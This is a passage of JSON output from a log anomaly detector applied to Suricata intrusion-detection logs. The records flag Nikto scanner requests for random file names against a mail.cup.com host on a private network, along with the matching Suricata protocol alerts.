"/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46922,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46922, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1513189976763438,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1513189976763438, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.325456+0000\",\"flow_id\":1513189976763438,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46922,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.327360 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46924 -> 192.168.10.154:80", "/parser/model/time": 1583349514.32736, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46924, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.327360 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46924 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.pdf", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.327560+0000\",\"flow_id\":15431801437120,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46924,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pdf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pdf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.32756, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":15431801437120,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46924,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pdf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pdf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46924,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pdf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pdf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.pdf\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.pdf\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.pdf", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.pdf", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46924,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46924, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":15431801437120,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 15431801437120, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.327560+0000\",\"flow_id\":15431801437120,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46924,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pdf\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pdf\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.328985 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46926 -> 192.168.10.154:80", "/parser/model/time": 1583349514.328985, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46926, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.328985 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46926 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.pw", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.329101+0000\",\"flow_id\":593912356536889,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46926,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pw\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pw\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.329101, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":593912356536889,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46926,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pw\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pw\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46926,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pw\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pw\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.pw\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.pw\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.pw", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.pw", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46926,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46926, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":593912356536889,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 593912356536889, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.329101+0000\",\"flow_id\":593912356536889,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46926,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.pw\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.pw\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.330544 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46928 -> 192.168.10.154:80", "/parser/model/time": 1583349514.330544, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46928, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.330544 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46928 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.33 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.cobalt", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.330734+0000\",\"flow_id\":246780214773980,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46928,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cobalt\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cobalt\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.330734, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":246780214773980,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": 